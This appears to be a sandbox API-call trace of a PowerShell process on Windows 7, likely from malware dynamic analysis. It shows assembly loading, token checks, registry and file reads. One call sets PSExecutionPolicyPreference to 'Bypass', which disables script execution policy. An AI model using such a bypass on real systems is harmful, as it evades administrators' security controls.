	[0133.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0133.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0133.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0134.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0134.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0141.632] bsearch (_Key=0x17b2a0, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.059] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0142.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.059] CoTaskMemFree (pv=0x42e2b0) 
	[0142.062] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0142.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.062] CoTaskMemFree (pv=0x42e2b0) 
	[0142.062] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0142.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.062] CoTaskMemFree (pv=0x42e2b0) 
	[0142.065] CoCreateGuid (in: pguid=0x17e088 | out: pguid=0x17e088*(Data1=0x98003eef, Data2=0x15b8, Data3=0x4774, Data4=([0]=0x91, [1]=0x63, [2]=0x76, [3]=0xc5, [4]=0xd, [5]=0x82, [6]=0x2c, [7]=0x56))) returned 0x0
	[0142.067] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0142.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.067] CoTaskMemFree (pv=0x42e2b0) 
	[0142.070] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0142.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.070] CoTaskMemFree (pv=0x42e2b0) 
	[0142.073] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0142.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0142.073] CoTaskMemFree (pv=0x42e2b0) 
	[0142.078] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0142.080] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x17dd30 | out: lpConsoleScreenBufferInfo=0x17dd30) returned 1
	[0142.085] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0142.085] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x17dd30 | out: lpConsoleScreenBufferInfo=0x17dd30) returned 1
	[0142.086] GetVersionExW (in: lpVersionInformation=0x17dcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17dcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0142.089] GetCurrentProcess () returned 0xffffffffffffffff
	[0142.090] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x17dd58 | out: TokenHandle=0x17dd58*=0x320) returned 1
	[0142.093] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17dc78 | out: TokenInformation=0x0, ReturnLength=0x17dc78) returned 0
	[0142.094] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3a38c0
	[0142.094] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3a38c0, TokenInformationLength=0x4, ReturnLength=0x17dc78 | out: TokenInformation=0x3a38c0, ReturnLength=0x17dc78) returned 1
	[0142.099] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x17ddd8 | out: phNewToken=0x17ddd8*=0x31c) returned 1
	[0142.100] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17dc78 | out: TokenInformation=0x0, ReturnLength=0x17dc78) returned 0
	[0142.101] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3a38f0, TokenInformationLength=0x4, ReturnLength=0x17dc78 | out: TokenInformation=0x3a38f0, ReturnLength=0x17dc78) returned 1
	[0142.196] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2c44cf8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x17dde8 | out: IsMember=0x17dde8) returned 1
	[0142.196] CloseHandle (hObject=0x31c) returned 1
	[0142.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0143.750] SetConsoleCtrlHandler (HandlerRoutine=0x1f8677c, Add=1) returned 1
	[0143.876] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0143.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0143.876] CoTaskMemFree (pv=0x42e2b0) 
	[0143.877] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0143.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0143.877] CoTaskMemFree (pv=0x42e2b0) 
	[0144.642] GetConsoleWindow () returned 0x30290
	[0144.645] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0144.648] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0144.650] CoCreateGuid (in: pguid=0x17ded0 | out: pguid=0x17ded0*(Data1=0x7cb32437, Data2=0x4c2, Data3=0x48ac, Data4=([0]=0x9e, [1]=0x6f, [2]=0xd1, [3]=0x9, [4]=0xb6, [5]=0x22, [6]=0xc7, [7]=0xb6))) returned 0x0
	[0144.652] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0144.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.652] CoTaskMemFree (pv=0x42e2b0) 
	[0146.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.159] CoTaskMemAlloc (cb=0x104) returned 0x42e2b0
	[0146.159] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x42e2b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0146.159] CoTaskMemFree (pv=0x42e2b0) 
	[0146.160] CoTaskMemAlloc (cb=0xcc) returned 0x4376f0
	[0146.160] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4376f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.160] CoTaskMemFree (pv=0x4376f0) 
	[0146.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x17da48 | out: phkResult=0x17da48*=0x324) returned 0x0
	[0146.160] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x17d9cc, lpData=0x0, lpcbData=0x17d9c8*=0x0 | out: lpType=0x17d9cc*=0x2, lpData=0x0, lpcbData=0x17d9c8*=0x6c) returned 0x0
	[0146.160] CoTaskMemAlloc (cb=0x70) returned 0x3d44d0
	[0146.160] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x17d99c, lpData=0x3d44d0, lpcbData=0x17d998*=0x6c | out: lpType=0x17d99c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x17d998*=0x6c) returned 0x0
	[0146.160] CoTaskMemFree (pv=0x3d44d0) 
	[0146.160] CoTaskMemAlloc (cb=0xcc) returned 0x4376f0
	[0146.160] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x4376f0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0146.161] CoTaskMemFree (pv=0x4376f0) 
	[0146.161] CoTaskMemAlloc (cb=0xcc) returned 0x4376f0
	[0146.161] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4376f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.161] CoTaskMemFree (pv=0x4376f0) 
	[0146.164] RegCloseKey (hKey=0x324) returned 0x0
	[0146.164] CoTaskMemAlloc (cb=0xcc) returned 0x4376f0
	[0146.164] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4376f0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.164] CoTaskMemFree (pv=0x4376f0) 
	[0146.164] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x17da48 | out: phkResult=0x17da48*=0x324) returned 0x0
	[0146.164] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x17d9cc, lpData=0x0, lpcbData=0x17d9c8*=0x0 | out: lpType=0x17d9cc*=0x0, lpData=0x0, lpcbData=0x17d9c8*=0x0) returned 0x2
	[0146.164] RegCloseKey (hKey=0x324) returned 0x0
	[0146.382] CoTaskMemAlloc (cb=0x20c) returned 0x406080
	[0146.382] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x406080 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.892] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0146.893] GetFileType (hFile=0x330) returned 0x1
	[0146.893] SetErrorMode (uMode=0x1) returned 0x1
	[0146.893] GetFileType (hFile=0x330) returned 0x1
	[0146.897] ReadFile (in: hFile=0x330, lpBuffer=0x2ccbe28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d648, lpOverlapped=0x0 | out: lpBuffer=0x2ccbe28*, lpNumberOfBytesRead=0x17d648*=0x1000, lpOverlapped=0x0) returned 1
	[0146.900] ReadFile (in: hFile=0x330, lpBuffer=0x2ccbe28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d648, lpOverlapped=0x0 | out: lpBuffer=0x2ccbe28*, lpNumberOfBytesRead=0x17d648*=0x1000, lpOverlapped=0x0) returned 1
	[0146.900] ReadFile (in: hFile=0x330, lpBuffer=0x2ccbe28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d648, lpOverlapped=0x0 | out: lpBuffer=0x2ccbe28*, lpNumberOfBytesRead=0x17d648*=0x1000, lpOverlapped=0x0) returned 1
	[0146.901] ReadFile (in: hFile=0x330, lpBuffer=0x2ccbe28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d648, lpOverlapped=0x0 | out: lpBuffer=0x2ccbe28*, lpNumberOfBytesRead=0x17d648*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.901] ReadFile (in: hFile=0x330, lpBuffer=0x2ccb283, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x17d648, lpOverlapped=0x0 | out: lpBuffer=0x2ccb283*, lpNumberOfBytesRead=0x17d648*=0x0, lpOverlapped=0x0) returned 1
	[0146.901] ReadFile (in: hFile=0x330, lpBuffer=0x2ccbe28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x17d648, lpOverlapped=0x0 | out: lpBuffer=0x2ccbe28*, lpNumberOfBytesRead=0x17d648*=0x0, lpOverlapped=0x0) returned 1
	[0146.903] CloseHandle (hObject=0x330) returned 1
	[0148.340] GetSystemInfo (in: lpSystemInfo=0x17c2e0 | out: lpSystemInfo=0x17c2e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.341] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.524] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.325] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.326] VirtualQuery (in: lpAddress=0x17c390, lpBuffer=0x17d250, dwLength=0x30 | out: lpBuffer=0x17d250*(BaseAddress=0x17c000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
